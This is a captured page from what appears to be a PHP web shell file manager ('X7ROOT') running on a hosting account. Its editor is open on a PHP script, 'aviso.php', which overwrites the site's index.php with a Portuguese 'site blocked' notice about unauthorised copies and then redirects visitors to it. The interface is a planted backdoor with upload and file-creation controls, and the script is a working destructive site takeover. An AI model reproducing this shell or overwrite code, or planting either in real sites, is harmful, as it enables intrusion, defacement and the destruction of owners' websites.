X7ROOT File Manager
PHP:
7.4.33
OS:
Linux
User:
br4sil
Root
/
home
/
br4sil
/
public_html
/
para
/
index
📤 Upload
📝 New File
📁 New Folder
Close
Editing: aviso.php
<?php $dados = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Novo site</title> <style type="text/css"> .texto { text-align: center; font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; font-size: 36px; color: #D61D00; font-weight: bold; } .texto2 { font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; font-size: 14px; color: #999; } </style> </head> <body> <p align="center"><br /> <span class="texto">Site Bloqueado... <br/>Contate seu suporte ...<br /> </span><span class="texto2">Se você e proprietário deste site, <br /> Ou você vendeu uma cópia não autorizada a terceiros<br/> Ou comprou uma cópia não autorizada de terceiros<br/>E por isso seu sistema foi bloqueado! </span></p> </body> </html> '; $caminho = 'index.php'; $fp = fopen("$caminho", "w"); $escreve = fwrite($fp, "$dados"); fclose($fp); echo"<script>window.location = 'index.php';</script>"; ?>
Save
Cancel